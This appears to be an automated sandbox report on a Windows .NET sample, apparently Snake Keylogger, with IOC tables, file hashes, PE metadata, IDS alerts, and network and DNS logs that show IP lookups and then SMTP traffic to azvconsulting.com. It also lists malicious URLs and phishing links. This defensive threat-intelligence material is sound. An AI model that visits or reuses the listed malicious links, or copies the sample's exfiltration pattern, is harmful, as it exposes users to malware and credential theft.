checkip.dyndns.com | REVISED INVOICE.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | Inquiry N_ TM23-10-00.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | 41570002689_20220814_05352297_HesapOzeti.exe | malicious | MassLogger RAT | 132.226.8.169
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 172.67.206.204
CLOUDFLARENETUS | Scan_8346203.pdf | malicious | Unknown | 104.18.95.41
CLOUDFLARENETUS | https://re.e-sharedonedrivefile.com/skjashd | malicious | Unknown | 172.67.149.171
CLOUDFLARENETUS | https://t.ly/ZPR23.10 | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | https://us-west-2.protection.sophos.com/?d=site.pro&u=aHR0cHM6Ly9jbGF1ZGlha3J1ZWdlci5zaXRlLnByby8=&i=NThlN2NjYzYyOTljZjkxNGY4YmM1Njkz&t=QTRyTlRXbysvd3IyNERLT1pJYVNuNlAvU0FLMVAyb2pCN053UGFJSWtBST0=&h=dd65eaa7298b4ffebbd13b01dcbd3434&s=AVNPUEhUT0NFTkNSWVBUSVYfWTd0VrJEAZ1PFPx8UNdDDkWk4HVuGeVZrBnJzV7Ifg | malicious | Unknown | 172.64.151.101
CLOUDFLARENETUS | winzg.exe | malicious | Unknown | 172.67.162.203
CLOUDFLARENETUS | winzg.exe | malicious | Unknown | 104.21.90.238
CLOUDFLARENETUS | https://t.ly/cI3Tm | malicious | Unknown | 104.20.6.133
CLOUDFLARENETUS | Totalenergies.com_reff_3243808335_ATGeyDyASJ.html | malicious | Phisher | 104.17.25.14
CLOUDFLARENETUS | https://app.oneflow.com/api/agreements/8821185/assets/b81e65c04f5acdc6369b89fe6d9aba378483abd6.pdf?at=490c38a4784c740c75de3531f3291888226b3acd | malicious | Unknown | 188.114.96.3
S4N-ASES | qbXaqu1O6O.elf | malicious | Mirai | 185.14.58.174
S4N-ASES | XFem90EWlz.elf | malicious | Mirai | 185.14.58.161
S4N-ASES | UBB4sPTSCi.elf | malicious | Mirai | 185.14.58.188
S4N-ASES | 9WDxWYPBQq.elf | malicious | Mirai | 185.14.58.193
S4N-ASES | notabotnet.mips | malicious | Mirai | 185.14.58.161
S4N-ASES | xd.arm | malicious | Mirai | 185.14.58.188
S4N-ASES | JyvDqLVH73 | malicious | Mirai | 185.14.58.190
S4N-ASES | https://kocoonsaludyaventura.com/wp | malicious | Unknown | 185.14.57.27
S4N-ASES | x86 | malicious | Mirai | 185.14.58.169
S4N-ASES | r4cks.arm | malicious | Mirai | 185.14.58.175
ORACLE-BMC-31898US | InvoiceXCopy.xls | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | Pedido urgente_pdf.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | Ziraat Bankasi Swift Mesaji,pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | AmountXpayable.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | REVISED INVOICE.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | Inquiry N_ TM23-10-00.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | greatthingswithgreatideasgivenmerestthignstgood.hta | malicious | Cobalt Strike, Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | la.bot.arm.elf | malicious | Unknown | 144.25.234.65
ORACLE-BMC-31898US | la.bot.arm7.elf | malicious | Unknown | 130.61.64.122
Match (JA3) | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | eFo07GvEf0.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Pedido urgente_pdf.exe | malicious | Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Ziraat Bankasi Swift Mesaji,pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | AmountXpayable.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | FINAL SHIPPING DOCS.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | REVISED INVOICE.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Inquiry N_ TM23-10-00.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | 41570002689_20220814_05352297_HesapOzeti.exe | malicious | MassLogger RAT | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | PAYMENT ADVISE MT107647545.exe | malicious | Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | greatthingswithgreatideasgivenmerestthignstgood.hta | malicious | Cobalt Strike, Snake Keylogger | 188.114.97.3
                          No context
Process: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
File Type: CSV text
Category: dropped
Size (bytes): 1510
Entropy (8bit): 5.380493107040482
Encrypted: false
SSDEEP: 24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNl+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAA
MD5: 3C7E5782E6C100B90932CBDED08ADE42
SHA1: D498EE0833BB8C85592FB3B1E482267362DB3F74
SHA-256: 361A6FF160343A2400F7D3FA4A009EA20C994B9788C190EB9D53E544BB376490
SHA-512: 3A90D61631F4DC920860AEA31FDB5E56A102206311705D5D084E809D364F680B4E95F19CE9849D3F9CB3C2C273393FD2F2C67720BAAA885125EE358D59462B0A
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
File type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.656954215082718
TrID:
• Win64 Executable GUI Net Framework (217006/5) 49.88%
• Win64 Executable GUI (202006/5) 46.43%
• Win64 Executable (generic) (12005/4) 2.76%
• Generic Win/DOS Executable (2004/3) 0.46%
• DOS Executable Generic (2002/1) 0.46%
File name: rp8s2rxD5lpuQAG.exe
File size: 655'872 bytes
MD5: 43299ecabd7a0636e5755414d6b7dc0c
SHA1: 488e54f43753706c1ea4e9ba9adffcac501ca086
SHA256: 21a47b89b543c1b97adba1999aba18a149cf9e96e00bdabe70f929ba1a8b424e
SHA512: 5497d51a7fd3bd96088f7d70cd3b8f204a9d1840dc58422e68b03022222ccf89e4b844d9e795c5f511fbcdd2391faf42aa177f234e1f456c7eff181565d2e406
SSDEEP: 12288:r23MMXEjLA7SM50UeSx9q2S5RB4ZBCErR4ylFayRPODJvEtDV:JLA7EqfSUZBCqfbaRJM
TLSH: FAD412986A68CB16D5D217B45A60E7341779AE8EF812D20B8FEE7CDB7C36B044900773
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...pXV..........."...0.................. .....@..... .......................@............@...@......@............... .....
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140000000
Entrypoint Section: (none)
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xB3565870 [Tue May 5 20:20:00 2065 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: (none)
                          Instruction
                          dec ebp
                          pop edx
                          nop
                          add byte ptr [ebx], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], al
                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x5bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9fbe4 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9f83c | 0x9fa00 | 01721a60170b8f06d6a4aae3c4196410 | False | 0.9048872479444009 | data | 7.66181548748652 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa2000 | 0x5bc | 0x600 | 8482042ac132889b22b859176ba24936 | False | 0.4225260416666667 | data | 4.093280562026085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa2090 | 0x32c | data | | | 0.42980295566502463
RT_MANIFEST | 0xa23cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-23T16:01:34.492664+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | TCP
2024-10-23T16:01:35.633309+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | TCP
2024-10-23T16:01:36.356933+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | TCP
2024-10-23T16:01:37.086424+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49710 | 193.122.130.0 | 80 | TCP
2024-10-23T16:01:38.555166+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49713 | 193.122.130.0 | 80 | TCP
2024-10-23T16:01:42.411660+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 23, 2024 16:01:37.047979116 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.048005104 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.048094988 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.048424006 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.048434019 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.086424112 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.668328047 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.669713974 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.669730902 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.820276022 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.820352077 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.820466995 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.821106911 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.825218916 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.826334000 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.831163883 CEST8049710193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:37.831372023 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.831873894 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:37.831989050 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.832098007 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.837810040 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:38.509852886 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:38.511770964 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:38.511816025 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:38.511885881 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:38.512265921 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:38.512291908 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:38.555166006 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.146176100 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.156038046 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.156075001 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.297780991 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.298017025 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.298084974 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.298613071 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.303621054 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.309202909 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:39.309305906 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.309393883 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.314762115 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:39.985116005 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:39.987135887 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.987170935 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.987258911 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.987644911 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.987659931 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.039558887 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:40.630409002 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.635473967 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:40.635504007 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.990469933 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.990560055 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.990751028 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:40.991833925 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:40.996474028 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:40.997916937 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.003510952 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.003598928 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.003637075 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.003742933 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.003918886 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.009319067 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.658071041 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.659616947 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:41.659691095 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:41.659775972 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:41.660334110 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:41.660368919 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:41.711450100 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.268120050 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.269793034 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:42.269870996 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.411731958 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.411879063 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.412026882 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:42.412939072 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:42.416882038 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.418144941 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.422593117 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:42.422681093 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.423984051 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:42.424067020 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.424170971 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.429467916 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.090066910 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.091892958 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.091933012 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.092005014 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.092312098 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.092333078 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.133335114 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.711544037 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.713272095 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.713296890 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.857877970 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.858094931 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.858203888 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.858807087 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.862483025 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.863539934 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.869175911 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.869364023 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.869554043 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.874990940 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.899662971 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.899739981 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:44.558108091 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:44.559967041 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:44.560000896 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:44.560069084 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:44.560350895 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:44.560364962 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:44.602063894 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:46.196131945 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.198041916 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:46.198067904 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.345122099 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.345392942 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.345560074 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:46.349195957 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:51.679375887 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:51.685400963 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:51.685465097 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:51.765368938 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:51.770831108 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:51.770991087 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:52.697479010 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:52.698625088 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:52.703999996 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:52.950872898 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:52.953181982 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:52.958489895 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.204345942 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.204699993 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:53.210180998 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.485181093 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.486671925 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:53.493563890 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.738452911 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.738666058 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:53.744149923 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.991113901 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.995760918 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:54.001668930 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:54.001739025 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:02:43.546772003 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:02:43.546838999 CEST4971380192.168.2.5193.122.130.0
                          | Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                          |---|---|---|---|---|
                          | Oct 23, 2024 16:01:33.580614090 CEST | 62581 | 53 | 192.168.2.5 | 1.1.1.1 |
                          | Oct 23, 2024 16:01:33.588741064 CEST | 53 | 62581 | 1.1.1.1 | 192.168.2.5 |
                          | Oct 23, 2024 16:01:34.466450930 CEST | 56539 | 53 | 192.168.2.5 | 1.1.1.1 |
                          | Oct 23, 2024 16:01:34.474248886 CEST | 53 | 56539 | 1.1.1.1 | 192.168.2.5 |
                          | Oct 23, 2024 16:01:51.681301117 CEST | 62710 | 53 | 192.168.2.5 | 1.1.1.1 |
                          | Oct 23, 2024 16:01:51.762362957 CEST | 53 | 62710 | 1.1.1.1 | 192.168.2.5 |
                          | Oct 23, 2024 16:02:04.431243896 CEST | 64271 | 53 | 192.168.2.5 | 1.1.1.1 |
                          | Oct 23, 2024 16:02:04.516516924 CEST | 53 | 64271 | 1.1.1.1 | 192.168.2.5 |
                          | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
                          |---|---|---|---|---|---|---|---|---|
                          | Oct 23, 2024 16:01:33.580614090 CEST | 192.168.2.5 | 1.1.1.1 | 0x4635 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:34.466450930 CEST | 192.168.2.5 | 1.1.1.1 | 0x8663 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:51.681301117 CEST | 192.168.2.5 | 1.1.1.1 | 0x527e | Standard query (0) | azvconsulting.com | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:02:04.431243896 CEST | 192.168.2.5 | 1.1.1.1 | 0x7680 | Standard query (0) | azvconsulting.com | A (IP address) | IN (0x0001) | false |
                          | Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
                          |---|---|---|---|---|---|---|---|---|---|---|
                          | Oct 23, 2024 16:01:33.588741064 CEST | 1.1.1.1 | 192.168.2.5 | 0x4635 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:33.588741064 CEST | 1.1.1.1 | 192.168.2.5 | 0x4635 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:33.588741064 CEST | 1.1.1.1 | 192.168.2.5 | 0x4635 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:33.588741064 CEST | 1.1.1.1 | 192.168.2.5 | 0x4635 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:33.588741064 CEST | 1.1.1.1 | 192.168.2.5 | 0x4635 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:33.588741064 CEST | 1.1.1.1 | 192.168.2.5 | 0x4635 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:34.474248886 CEST | 1.1.1.1 | 192.168.2.5 | 0x8663 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:34.474248886 CEST | 1.1.1.1 | 192.168.2.5 | 0x8663 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:01:51.762362957 CEST | 1.1.1.1 | 192.168.2.5 | 0x527e | No error (0) | azvconsulting.com | | 185.14.58.143 | A (IP address) | IN (0x0001) | false |
                          | Oct 23, 2024 16:02:04.516516924 CEST | 1.1.1.1 | 192.168.2.5 | 0x7680 | No error (0) | azvconsulting.com | | 185.14.58.143 | A (IP address) | IN (0x0001) | false |
                          • reallyfreegeoip.org
                          • checkip.dyndns.org
                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                          |---|---|---|---|---|---|---|
                          | 0 | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe |
                          Timestamp | Bytes transferred | Direction | Data
